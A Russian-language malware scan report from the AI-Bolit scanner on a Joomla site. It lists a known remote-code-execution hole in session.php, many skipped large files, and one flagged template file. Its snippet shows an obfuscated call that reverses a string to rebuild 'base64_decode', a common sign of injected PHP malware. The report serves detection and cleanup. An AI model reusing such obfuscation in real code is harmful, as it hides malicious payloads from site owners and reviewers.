Отчет сканера AI-Bolit v20171003: /claster/drbd0/virtual_servers/rrsng/ (1/1)
Скрипт бесплатный только для личного некоммерческого использования. Есть коммерческая лицензия (пункт №11).
Затрачено времени: 4 m . Сканирование начато 15-10-2017 в 15:41:29, сканирование завершено 15-10-2017 в 15:46:13
Всего проверено 2158 директорий и 8994 файлов. Использовано памяти при сканировании: 7.79 Mb.
Сводный отчет
Вредоносных скриптов1
Пропущенных больших файлов42
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер старается минимизировать число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.
Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Скорее всего, ваш сайт был взломан и заражен. Рекомендуем срочно обратиться за консультацией к специалистам по информационной безопасности.

Пришлите нам отчет в архиве .zip на ai@revisium.com для проверки вашего сайта на вирусы и взлом.

Компания "Ревизиум" - лечение сайта от вирусов и защита от взлома.


Также выполните дополнительный анализ новым веб-сканером ReScan.Pro.

Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Критические замечания
Уязвимости в скриптах (1)
  • /claster/drbd0/virtual_servers/rrsng/html/libraries/joomla/session/session.php - RCE : https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
  • Эти файлы могут быть вредоносными или хакерскими скриптами (1)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] 1…'_JEXEC') or die('Restricted access');?><!--[if lte IE 8]><script src="<?php $_D= strrev('edoced_46esab');echo$this->baseurl?>/templates/<?php echo$this->templat
    24/11/2015 08:59:20
    16/03/2015 05:36:10
    924 b
    fb321c0ade2b93b3b4b07a165210d09cfdfefc39
    x
    1426484170
    id_9cd1bb0d
    Предупреждения
    Большие файлы (больше чем 600.00 Kb). Пропущено
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    15/05/2017 06:23:31
    15/05/2017 06:23:31
    906.06 Kb
    cdb706eb0668a37162ccf4918881d18bc60650a8
    x
    1494829411
    id_z3912821
    26/01/2016 11:55:13
    26/01/2016 08:10:00
    8.41 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453795800
    id_z2175130
    26/01/2016 11:55:16
    26/01/2016 08:10:58
    5.35 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453795858
    id_z8207694
    26/01/2016 11:55:12
    26/01/2016 08:05:54
    8.82 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453795554
    id_z5226553
    26/01/2016 11:55:34
    26/01/2016 08:16:28
    13.04 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796188
    id_z5625210
    26/01/2016 11:55:25
    26/01/2016 08:12:24
    7.78 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453795944
    id_z5952283
    26/01/2016 11:55:30
    26/01/2016 08:13:30
    33.23 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796010
    id_z5269884
    26/01/2016 11:55:32
    26/01/2016 08:15:16
    14.43 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796116
    id_z7406529
    26/01/2016 11:55:52
    26/01/2016 08:28:06
    25.52 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796886
    id_z4009409
    26/01/2016 11:55:55
    26/01/2016 08:29:14
    13.88 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796954
    id_z4690224
    26/01/2016 11:55:44
    26/01/2016 08:23:08
    19.59 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796588
    id_z5873880
    26/01/2016 11:55:48
    26/01/2016 08:24:54
    27.60 Mb
    f3c975f0a5687b4eabce16352b9a3384852eed4a
    x
    1453796694
    id_z1652499
    26/01/2016 11:56:10
    26/01/2016 10:28:16
    1.67 Mb
    a6e2baa972d61484d7ae3fba20e343c03a25c8f7
    x
    1453804096
    id_z7348067
    26/01/2016 11:56:13
    26/01/2016 10:29:18
    1.37 Mb
    a6e2baa972d61484d7ae3fba20e343c03a25c8f7
    x
    1453804158
    id_z5447507
    26/01/2016 11:56:06
    26/01/2016 10:27:18
    6.93 Mb
    a6e2baa972d61484d7ae3fba20e343c03a25c8f7
    x
    1453804038
    id_z3155891
    24/11/2015 08:59:20
    16/09/2015 03:56:09
    668.44 Kb
    495cfd7e870b787a7c33ed9ad8d76216c6f571e2
    x
    1442375769
    id_z5220645
    24/11/2015 08:59:20
    11/09/2015 04:11:16
    609.35 Kb
    e49356698d8421595c6628b8819b61aa6ce3b1f0
    x
    1441944676
    id_z2930435
    24/11/2015 08:59:20
    11/09/2015 04:09:50
    2.89 Mb
    e49356698d8421595c6628b8819b61aa6ce3b1f0
    x
    1441944590
    id_z5064255
    24/11/2015 08:59:20
    11/09/2015 04:10:16
    1.74 Mb
    b73453b5a67a86aa3a7c8c52aac5f712e06ac6a6
    x
    1441944616
    id_z3920927
    24/11/2015 08:59:20
    11/09/2015 04:10:28
    1.07 Mb
    b73453b5a67a86aa3a7c8c52aac5f712e06ac6a6
    x
    1441944628
    id_z8345227
    24/11/2015 08:59:20
    11/09/2015 04:11:38
    722.34 Kb
    153f6efb34fca8dc0b82fab8571cfcb3d481c445
    x
    1441944698
    id_z5939036
    24/11/2015 08:59:20
    11/09/2015 04:12:14
    3.14 Mb
    f7dd26b9265604f08ff26f39c9981dc15dce7c92
    x
    1441944734
    id_z2848368
    24/11/2015 08:59:20
    11/09/2015 04:12:28
    673.23 Kb
    d84ae02cf17d16ff05e35b3e863c63e6a0eeb148
    x
    1441944748
    id_z8085286
    24/11/2015 08:59:20
    27/08/2015 05:55:53
    3.18 Mb
    d84ae02cf17d16ff05e35b3e863c63e6a0eeb148
    x
    1440654953
    id_z1218004
    24/11/2015 08:59:20
    11/09/2015 04:12:42
    1.21 Mb
    d84ae02cf17d16ff05e35b3e863c63e6a0eeb148
    x
    1441944762
    id_z1680215
    24/11/2015 08:59:20
    11/09/2015 04:13:16
    1,014.99 Kb
    d84ae02cf17d16ff05e35b3e863c63e6a0eeb148
    x
    1441944796
    id_z4855398
    24/11/2015 08:59:20
    11/09/2015 04:12:50
    1.60 Mb
    a695ecffac8b4152605b0c1b19e4c53374e2e273
    x
    1441944770
    id_z1196368
    24/11/2015 08:59:20
    11/09/2015 04:13:58
    1.95 Mb
    980a3056b016b9d4db9712b66fc84277c853f695
    x
    1441944838
    id_z5241652
    24/11/2015 08:59:20
    11/09/2015 04:13:48
    994.54 Kb
    b3008b35b90559ee9e8247361db08a60668230c3
    x
    1441944828
    id_z2152165
    24/11/2015 08:59:20
    11/09/2015 04:13:42
    1.17 Mb
    b3008b35b90559ee9e8247361db08a60668230c3
    x
    1441944822
    id_z1313683
    24/11/2015 08:59:20
    11/09/2015 04:13:26
    605.70 Kb
    72f53ae58d93de1ed77b468cb5ef598b99e69cb3
    x
    1441944806
    id_z7254942
    18/01/2016 10:14:59
    12/01/2016 04:09:59
    1.26 Mb
    2f4d6beafac00b94ac0c6b4f5c5a9fdeba2bbd49
    x
    1452571799
    id_z5064987
    18/01/2016 10:14:59
    12/01/2016 04:09:42
    774.70 Kb
    48fcb285aaa9c3b49162923d63eb278fcd61e7ff
    x
    1452571782
    id_z2488814
    24/11/2015 08:59:20
    11/09/2015 04:16:50
    1.13 Mb
    6964640d340212521185519b8e3fb491b634a665
    x
    1441945010
    id_z6462636
    24/11/2015 08:59:20
    22/10/2015 04:09:36
    760.80 Kb
    6964640d340212521185519b8e3fb491b634a665
    x
    1445486976
    id_z1291539
    28/10/2016 05:51:59
    28/10/2016 05:51:59
    659.04 Kb
    6964640d340212521185519b8e3fb491b634a665
    x
    1477633919
    id_z7114024
    02/12/2016 09:45:46
    02/12/2016 09:45:46
    1.36 Mb
    6964640d340212521185519b8e3fb491b634a665
    x
    1480671946
    id_z3414919
    15/05/2017 05:32:18
    15/05/2017 05:32:18
    1.26 Mb
    f6f4bbba841b5fe7ed25ed9e0c416aa24ec65952
    x
    1494826338
    id_z5561424
    04/02/2016 06:33:56
    04/02/2016 06:33:27
    5.55 Mb
    f6f4bbba841b5fe7ed25ed9e0c416aa24ec65952
    x
    1454567607
    id_z5520553
    27/06/2016 10:35:40
    27/06/2016 10:35:40
    5.05 Mb
    e270e8f32ebf114bf74c705f5f721b748a9b42a1
    x
    1467023740
    id_z6424328
    11/12/2015 05:39:39
    09/11/2015 08:05:01
    4.57 Mb
    e270e8f32ebf114bf74c705f5f721b748a9b42a1
    x
    1447056301
    id_z1251647
    18/05/2017 12:19:32
    18/05/2017 12:19:32
    1.84 Mb
    e270e8f32ebf114bf74c705f5f721b748a9b42a1
    x
    1495109972
    id_z2394432
    В не .php файле содержится стартовая сигнатура PHP кода. Возможно, там вредоносный код
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1…at,with one major exception: UCS-4 array is jsut an array,where each value repre sents one codepoint in the string,i.e.every value is a 32bit integer value.Exam
    24/11/2015 08:59:20
    01/10/2014 17:28:42
    7.48 Kb
    453d4b17886081545040e7d8c2387ef817e32fae
    x
    1412184522
    id_z7599714
    1…PHP Version: ".phpversion()."<br>";if(extension_loaded('mbstring')){print "mbstr ing available<br>";}else{print "mbstring not available<br>";}if(extension_loade
    24/11/2015 08:59:20
    01/10/2014 17:28:42
    3.29 Kb
    0db68ab318128db056781e41bcc4064f2f8afa33
    x
    1412184522
    id_z6841939
    Версии найденных CMS
    Joomla v0.0